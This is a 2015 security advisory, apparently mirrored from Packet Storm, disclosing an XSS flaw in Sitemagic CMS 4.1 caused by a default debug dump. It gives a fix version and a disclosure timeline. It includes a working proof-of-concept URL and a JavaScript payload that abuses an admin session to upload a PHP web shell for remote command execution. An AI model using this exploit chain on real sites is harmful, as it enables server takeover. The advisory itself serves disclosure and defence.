Sitemagic CMS 4.1 Cross Site Scripting

2015-11-16T00:00:00
ID PACKETSTORM:134350
Type packetstorm
Reporter Tim Coen
Modified 2015-11-16T00:00:00

Description

                                        
                                            `Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Sitemagic CMS 4.1  
Product:  
Fixed in: 4.1.1  
Fixed Version http://sitemagic.org/index.php?SMExt=SMDownloads&  
Link: SMDownloadsFile=SitemagicCMS411.zip  
Vendor Contact: dev@sitemagic.org  
Vulnerability XSS  
Type:  
Remote Yes  
Exploitable:  
Reported to 09/29/2015  
vendor:  
Disclosed to 11/13/2015  
public:  
Release mode: Coordinated release  
CVE: n/a  
Credits Tim Coen of Curesec GmbH  
  
2. Overview  
  
CVSS  
  
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N  
  
Description  
  
If debug is enabled - which it is by default - the values of POST and GET are  
echoed unencoded, leading to an XSS vulnerability. With this, it is possible to  
inject JavaScript keyloggers, or to bypass CSRF protection, which in this case  
may lead to code execution.  
  
3. Proof of Concept  
  
  
http://localhost/Sitemagic/?dump=true&foo='"></script><script>alert(1)</script>  
  
4. Code  
  
  
index.php  
if ($debug === true)  
{  
$end = microtime(true);  
  
if (isset($_REQUEST["dump"]) === true)  
{  
$time = $end - $start;  
  
echo "<br>Memory usage: " . memory_get_usage(true) / 1024 . " KB";  
echo "<br>Time usage: " . $time . " seconds";  
  
echo "  
<br><h3>POST</h3>  
<pre>" . print_r($_POST, true) . "</pre>  
  
<br><h3>GET</h3>  
<pre>" . print_r($_GET, true) . "</pre>  
";  
}  
}  
  
5. XSS to Code Execution  
  
Because the file upload in the admin area does not restrict the file type, an  
attacker can gain code execution via the XSS vulnerability.  
  
  
http://localhost/Sitemagic/?dump=true&foo="><script src="http://localhost/s.js"></script>  
  
/s.js:  
submitRequest();  
  
function submitRequest() {  
var xhr = new XMLHttpRequest();  
xhr.open("POST", "http://localhost/Sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages%2Fdemo", true);  
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");  
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------72100436920187879541838388265");  
xhr.withCredentials = true;  
var body = "-----------------------------72100436920187879541838388265\r\n" +  
"Content-Disposition: form-data; name=\"SMInputSMFilesUpload\"; filename=\"shell.php\"\r\n" +  
"Content-Type: application/x-php\r\n" +  
"\r\n" +  
"\x3c?php passthru($_GET[\'x\']); ?\x3e\n" +  
"\r\n" +  
"-----------------------------72100436920187879541838388265\r\n" +  
"Content-Disposition: form-data; name=\"SMPostBackControl\"\r\n" +  
"\r\n" +  
"\r\n" +  
"-----------------------------72100436920187879541838388265--\r\n";  
var aBody = new Uint8Array(body.length);  
for (var i = 0; i < aBody.length; i++)  
aBody[i] = body.charCodeAt(i);  
xhr.send(new Blob([aBody]));  
}  
  
6. Solution  
  
To mitigate this issue please upgrade at least to version 4.1.1:  
  
http://sitemagic.org/index.php?SMExt=SMDownloads&SMDownloadsFile=  
SitemagicCMS411.zip  
  
Please note that a newer version might already be available.  
  
7. Report Timeline  
  
09/29/2015 Informed Vendor about Issue  
09/29/2015 Vendor releases fix  
11/13/2015 Disclosed to public  
  
  
Blog Reference:  
http://blog.curesec.com/article/blog/Sitemagic-CMS-41-XSS-91.html  
  
  
`